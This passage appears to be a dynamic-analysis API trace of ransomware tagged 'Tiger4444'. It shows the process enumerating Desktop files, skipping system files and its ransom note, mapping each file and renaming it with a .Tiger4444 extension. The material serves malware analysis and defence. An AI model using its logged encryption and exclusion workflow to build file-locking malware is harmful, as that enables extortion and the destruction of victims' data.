flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8ea0, lpName=0x0) returned 0x2c8 [0048.342] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8ea0) returned 0xbe0000 [0048.343] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0048.343] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0048.343] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0048.343] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0048.343] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0048.343] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0048.343] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0048.343] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0048.343] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13979626015) returned 1 [0048.343] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0048.343] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0048.343] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0048.344] CloseHandle (hObject=0x2c8) returned 1 [0048.344] CloseHandle (hObject=0x260) returned 1 [0048.344] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\5j3J4t3qofV.wav.Tiger4444") returned 49 [0048.344] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\5j3J4t3qofV.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\5j3j4t3qofv.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\5j3J4t3qofV.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\5j3j4t3qofv.wav.tiger4444"), dwFlags=0x1) returned 1 [0048.345] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=35744 | out: Addend=0xc6f980) returned 23703392 [0048.345] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 5147 [0048.345] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dd75d0, ftCreationTime.dwHighDateTime=0x1d4ce1e, ftLastAccessTime.dwLowDateTime=0xda8c7630, ftLastAccessTime.dwHighDateTime=0x1d4c8f8, ftLastWriteTime.dwLowDateTime=0xda8c7630, ftLastWriteTime.dwHighDateTime=0x1d4c8f8, nFileSizeHigh=0x0, nFileSizeLow=0x182ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5tCVQ4PvbMxeLAZpu1.png", cAlternateFileName="5TCVQ4~1.PNG")) returned 1 [0048.345] lstrcmpiW (lpString1="5tCVQ4PvbMxeLAZpu1.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.345] lstrcmpiW (lpString1="5tCVQ4PvbMxeLAZpu1.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.345] lstrcmpiW (lpString1="5tCVQ4PvbMxeLAZpu1.png", lpString2="Tiger4444.exe") returned -1 [0048.345] lstrcmpiW (lpString1="5tCVQ4PvbMxeLAZpu1.png", lpString2=".") returned 1 [0048.345] lstrcmpiW (lpString1="5tCVQ4PvbMxeLAZpu1.png", lpString2="..") returned 1 [0048.345] lstrcmpiW (lpString1="5tCVQ4PvbMxeLAZpu1.png", lpString2="windows") returned -1 [0048.345] lstrcmpiW (lpString1="5tCVQ4PvbMxeLAZpu1.png", lpString2="bootmgr") returned -1 [0048.345] lstrcmpiW (lpString1="5tCVQ4PvbMxeLAZpu1.png", lpString2="pagefile.sys") returned -1 [0048.345] lstrcmpiW (lpString1="5tCVQ4PvbMxeLAZpu1.png", lpString2="boot") returned -1 [0048.345] lstrcmpiW (lpString1="5tCVQ4PvbMxeLAZpu1.png", lpString2="ids.txt") returned -1 [0048.345] lstrcmpiW (lpString1="5tCVQ4PvbMxeLAZpu1.png", lpString2="NTUSER.DAT") returned -1 [0048.345] lstrcpyW (in: lpString1=0x30aead8, lpString2="5tCVQ4PvbMxeLAZpu1.png" | out: lpString1="5tCVQ4PvbMxeLAZpu1.png") returned="5tCVQ4PvbMxeLAZpu1.png" [0048.345] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5tCVQ4PvbMxeLAZpu1.png", dwFileAttributes=0x0) returned 1 [0048.345] lstrlenW (lpString="5tCVQ4PvbMxeLAZpu1.png") returned 22 [0048.345] lstrlenW (lpString="Tiger4444") returned 9 [0048.345] lstrcmpiW (lpString1="AZpu1.png", lpString2="Tiger4444") returned -1 [0048.345] lstrlenW (lpString=".dll") returned 4 [0048.345] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0048.345] lstrlenW (lpString=".lnk") returned 4 [0048.345] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0048.345] lstrlenW (lpString=".ini") returned 4 [0048.345] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0048.345] lstrlenW (lpString=".sys") returned 4 [0048.345] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0048.345] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5tCVQ4PvbMxeLAZpu1.png" (normalized: "c:\\users\\fd1hvy\\desktop\\5tcvq4pvbmxelazpu1.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0048.346] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0048.346] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13979876128) returned 1 [0048.346] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=99071) returned 1 [0048.346] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0048.346] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0048.346] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18600, lpName=0x0) returned 0x2c8 [0048.346] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18600) returned 0xbe0000 [0048.348] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0048.348] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0048.348] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0048.348] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0048.348] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0048.348] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0048.348] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0048.348] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0048.348] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13980127410) returned 1 [0048.348] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0048.348] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0048.348] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0048.349] CloseHandle (hObject=0x2c8) returned 1 [0048.349] CloseHandle (hObject=0x260) returned 1 [0048.350] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\5tCVQ4PvbMxeLAZpu1.png.Tiger4444") returned 56 [0048.350] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\5tCVQ4PvbMxeLAZpu1.png" (normalized: "c:\\users\\fd1hvy\\desktop\\5tcvq4pvbmxelazpu1.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\5tCVQ4PvbMxeLAZpu1.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\5tcvq4pvbmxelazpu1.png.tiger4444"), dwFlags=0x1) returned 1 [0048.350] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=99072 | out: Addend=0xc6f980) returned 23739136 [0048.350] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 5148 [0048.350] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf19f1870, ftCreationTime.dwHighDateTime=0x1d4caf9, ftLastAccessTime.dwLowDateTime=0x9ce6a210, ftLastAccessTime.dwHighDateTime=0x1d4c989, ftLastWriteTime.dwLowDateTime=0x9ce6a210, ftLastWriteTime.dwHighDateTime=0x1d4c989, nFileSizeHigh=0x0, nFileSizeLow=0xae2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7C4Q.mp4", cAlternateFileName="")) returned 1 [0048.350] lstrcmpiW (lpString1="7C4Q.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.350] lstrcmpiW (lpString1="7C4Q.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.351] lstrcmpiW (lpString1="7C4Q.mp4", lpString2="Tiger4444.exe") returned -1 [0048.351] lstrcmpiW (lpString1="7C4Q.mp4", lpString2=".") returned 1 [0048.351] lstrcmpiW (lpString1="7C4Q.mp4", lpString2="..") returned 1 [0048.351] lstrcmpiW (lpString1="7C4Q.mp4", lpString2="windows") returned -1 [0048.351] lstrcmpiW (lpString1="7C4Q.mp4", lpString2="bootmgr") returned -1 [0048.351] lstrcmpiW (lpString1="7C4Q.mp4", lpString2="pagefile.sys") returned -1 [0048.351] lstrcmpiW (lpString1="7C4Q.mp4", lpString2="boot") returned -1 [0048.351] lstrcmpiW (lpString1="7C4Q.mp4", lpString2="ids.txt") returned -1 [0048.351] lstrcmpiW (lpString1="7C4Q.mp4", lpString2="NTUSER.DAT") returned -1 [0048.351] lstrcpyW (in: lpString1=0x30aead8, lpString2="7C4Q.mp4" | out: lpString1="7C4Q.mp4") returned="7C4Q.mp4" [0048.351] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\7C4Q.mp4", dwFileAttributes=0x0) returned 1 [0048.351] lstrlenW (lpString="7C4Q.mp4") returned 8 [0048.351] lstrlenW (lpString="Tiger4444") returned 9 [0048.351] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0048.351] lstrlenW (lpString=".dll") returned 4 [0048.351] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0048.351] lstrlenW (lpString=".lnk") returned 4 [0048.351] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0048.351] lstrlenW (lpString=".ini") returned 4 [0048.351] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0048.351] lstrlenW (lpString=".sys") returned 4 [0048.351] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0048.351] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\7C4Q.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\7c4q.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.450] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.450] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14090360358) returned 1 [0049.451] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=44586) returned 1 [0049.451] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0049.451] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0049.451] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb130, lpName=0x0) returned 0x2c8 [0049.451] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb130) returned 0xbe0000 [0049.452] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.452] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0049.452] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.452] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0049.452] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.452] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0049.452] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.453] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0049.453] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14090566781) returned 1 [0049.453] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0049.453] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0049.453] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.453] CloseHandle (hObject=0x2c8) returned 1 [0049.453] CloseHandle (hObject=0x260) returned 1 [0049.456] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\7C4Q.mp4.Tiger4444") returned 42 [0049.456] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\7C4Q.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\7c4q.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\7C4Q.mp4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\7c4q.mp4.tiger4444"), dwFlags=0x1) returned 1 [0049.476] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba92b0, ftCreationTime.dwHighDateTime=0x1d4d072, ftLastAccessTime.dwLowDateTime=0xfa5c1740, ftLastAccessTime.dwHighDateTime=0x1d4d221, ftLastWriteTime.dwLowDateTime=0xfa5c1740, ftLastWriteTime.dwHighDateTime=0x1d4d221, nFileSizeHigh=0x0, nFileSizeLow=0x11b24, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="85suf.pdf", cAlternateFileName="")) returned 1 [0049.476] lstrcmpiW (lpString1="85suf.pdf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.476] lstrcmpiW (lpString1="85suf.pdf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.476] lstrcmpiW (lpString1="85suf.pdf", lpString2="Tiger4444.exe") returned -1 [0049.476] lstrcmpiW (lpString1="85suf.pdf", lpString2=".") returned 1 [0049.476] lstrcmpiW (lpString1="85suf.pdf", lpString2="..") returned 1 [0049.476] lstrcmpiW (lpString1="85suf.pdf", lpString2="windows") returned -1 [0049.476] lstrcmpiW (lpString1="85suf.pdf", lpString2="bootmgr") returned -1 [0049.476] lstrcmpiW (lpString1="85suf.pdf", lpString2="pagefile.sys") returned -1 [0049.476] lstrcmpiW (lpString1="85suf.pdf", lpString2="boot") returned -1 [0049.476] lstrcmpiW (lpString1="85suf.pdf", lpString2="ids.txt") returned -1 [0049.476] lstrcmpiW (lpString1="85suf.pdf", lpString2="NTUSER.DAT") returned -1 [0049.476] lstrcpyW (in: lpString1=0x30aead8, lpString2="85suf.pdf" | out: lpString1="85suf.pdf") returned="85suf.pdf" [0049.476] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\85suf.pdf", dwFileAttributes=0x0) returned 1 [0049.476] lstrlenW (lpString="85suf.pdf") returned 9 [0049.476] lstrlenW (lpString="Tiger4444") returned 9 [0049.477] lstrcmpiW (lpString1="85suf.pdf", lpString2="Tiger4444") returned -1 [0049.477] lstrlenW (lpString=".dll") returned 4 [0049.477] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.477] lstrlenW (lpString=".lnk") returned 4 [0049.477] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0049.477] lstrlenW (lpString=".ini") returned 4 [0049.477] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0049.477] lstrlenW (lpString=".sys") returned 4 [0049.477] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0049.477] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\85suf.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\85suf.pdf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.477] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.477] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14093000820) returned 1 [0049.477] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=72484) returned 1 [0049.477] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0049.477] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0049.477] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11e30, lpName=0x0) returned 0x2c8 [0049.477] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11e30) returned 0xbe0000 [0049.479] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.479] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0049.479] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.479] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0049.479] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.479] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0049.479] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.479] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0049.479] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14093209754) returned 1 [0049.479] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0049.479] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0049.479] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.480] CloseHandle (hObject=0x2c8) returned 1 [0049.480] CloseHandle (hObject=0x260) returned 1 [0049.481] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\85suf.pdf.Tiger4444") returned 43 [0049.481] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\85suf.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\85suf.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\85suf.pdf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\85suf.pdf.tiger4444"), dwFlags=0x1) returned 1 [0049.481] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76c47670, ftCreationTime.dwHighDateTime=0x1d4d23a, ftLastAccessTime.dwLowDateTime=0xb1f06bc0, ftLastAccessTime.dwHighDateTime=0x1d4cf4a, ftLastWriteTime.dwLowDateTime=0xb1f06bc0, ftLastWriteTime.dwHighDateTime=0x1d4cf4a, nFileSizeHigh=0x0, nFileSizeLow=0x18b88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9Nd9jssXw99ThRBTNM7P.png", cAlternateFileName="9ND9JS~1.PNG")) returned 1 [0049.481] lstrcmpiW (lpString1="9Nd9jssXw99ThRBTNM7P.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.481] lstrcmpiW (lpString1="9Nd9jssXw99ThRBTNM7P.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.481] lstrcmpiW (lpString1="9Nd9jssXw99ThRBTNM7P.png", lpString2="Tiger4444.exe") returned -1 [0049.481] lstrcmpiW (lpString1="9Nd9jssXw99ThRBTNM7P.png", lpString2=".") returned 1 [0049.481] lstrcmpiW (lpString1="9Nd9jssXw99ThRBTNM7P.png", lpString2="..") returned 1 [0049.481] lstrcmpiW (lpString1="9Nd9jssXw99ThRBTNM7P.png", lpString2="windows") returned -1 [0049.481] lstrcmpiW (lpString1="9Nd9jssXw99ThRBTNM7P.png", lpString2="bootmgr") returned -1 [0049.481] lstrcmpiW (lpString1="9Nd9jssXw99ThRBTNM7P.png", lpString2="pagefile.sys") returned -1 [0049.481] lstrcmpiW (lpString1="9Nd9jssXw99ThRBTNM7P.png", lpString2="boot") returned -1 [0049.481] lstrcmpiW (lpString1="9Nd9jssXw99ThRBTNM7P.png", lpString2="ids.txt") returned -1 [0049.481] lstrcmpiW (lpString1="9Nd9jssXw99ThRBTNM7P.png", lpString2="NTUSER.DAT") returned -1 [0049.481] lstrcpyW (in: lpString1=0x30aead8, lpString2="9Nd9jssXw99ThRBTNM7P.png" | out: lpString1="9Nd9jssXw99ThRBTNM7P.png") returned="9Nd9jssXw99ThRBTNM7P.png" [0049.481] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9Nd9jssXw99ThRBTNM7P.png", dwFileAttributes=0x0) returned 1 [0049.482] lstrlenW (lpString="9Nd9jssXw99ThRBTNM7P.png") returned 24 [0049.482] lstrlenW (lpString="Tiger4444") returned 9 [0049.482] lstrcmpiW (lpString1="TNM7P.png", lpString2="Tiger4444") returned 1 [0049.482] lstrlenW (lpString=".dll") returned 4 [0049.482] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0049.482] lstrlenW (lpString=".lnk") returned 4 [0049.482] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0049.482] lstrlenW (lpString=".ini") returned 4 [0049.482] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0049.482] lstrlenW (lpString=".sys") returned 4 [0049.482] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0049.482] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9Nd9jssXw99ThRBTNM7P.png" (normalized: "c:\\users\\fd1hvy\\desktop\\9nd9jssxw99thrbtnm7p.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.482] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.482] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14093629397) returned 1 [0049.483] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=101256) returned 1 [0049.483] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0049.483] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0049.483] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18e90, lpName=0x0) returned 0x2c8 [0049.483] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18e90) returned 0xbe0000 [0049.485] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.485] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0049.485] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.485] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0049.485] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.486] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0049.486] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.486] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0049.486] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14093873602) returned 1 [0049.486] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0049.486] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0049.486] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.487] CloseHandle (hObject=0x2c8) returned 1 [0049.487] CloseHandle (hObject=0x260) returned 1 [0049.487] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\9Nd9jssXw99ThRBTNM7P.png.Tiger4444") returned 58 [0049.487] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\9Nd9jssXw99ThRBTNM7P.png" (normalized: "c:\\users\\fd1hvy\\desktop\\9nd9jssxw99thrbtnm7p.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\9Nd9jssXw99ThRBTNM7P.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\9nd9jssxw99thrbtnm7p.png.tiger4444"), dwFlags=0x1) returned 1 [0049.487] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe55f8a50, ftCreationTime.dwHighDateTime=0x1d4c8fa, ftLastAccessTime.dwLowDateTime=0x66f1f310, ftLastAccessTime.dwHighDateTime=0x1d4cd05, ftLastWriteTime.dwLowDateTime=0x66f1f310, ftLastWriteTime.dwHighDateTime=0x1d4cd05, nFileSizeHigh=0x0, nFileSizeLow=0x7d45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aGhyAFRoo.odp", cAlternateFileName="AGHYAF~1.ODP")) returned 1 [0049.488] lstrcmpiW (lpString1="aGhyAFRoo.odp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.488] lstrcmpiW (lpString1="aGhyAFRoo.odp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.488] lstrcmpiW (lpString1="aGhyAFRoo.odp", lpString2="Tiger4444.exe") returned -1 [0049.488] lstrcmpiW 